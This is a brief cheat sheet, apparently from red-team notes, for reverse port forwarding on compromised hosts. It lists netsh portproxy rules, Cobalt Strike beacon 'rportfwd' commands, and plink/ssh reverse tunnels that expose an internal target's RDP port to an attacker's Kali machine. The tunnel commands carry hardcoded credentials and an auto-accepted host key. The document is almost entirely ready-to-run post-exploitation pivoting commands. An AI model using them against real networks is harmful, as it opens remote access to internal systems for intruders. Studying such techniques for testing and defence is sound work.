Reverse Port Forwards

Windows Netsh

C:\>netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=4444 connectaddress=10.10.14.55 connectport=4444 protocol=tcp 

netsh interface portproxy show v4tov4

C:\>netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=4444

Beacon Host (8080) -> Cobalt Server -> External Server

beacon> rportfwd 8080 10.10.5.120 80

beacon> run netstat -anp tcp

beacon> rportfwd stop 8080

Beacon Host (8080) -> Local Machine

beacon> rportfwd_local 8080 127.0.0.1 8080

Reverse Port Forwarding

# Plink (Internal Target Machine)
cmd.exe /c echo y | plink.exe -ssh -l kali -pw kali -R 4444:192.168.80.200:3389 192.168.222.76 

# SSH (Internal Target Machine)
ssh -R 4444:127.0.0.1:3389 kali@192.168.222.76 # then enter password

Last updated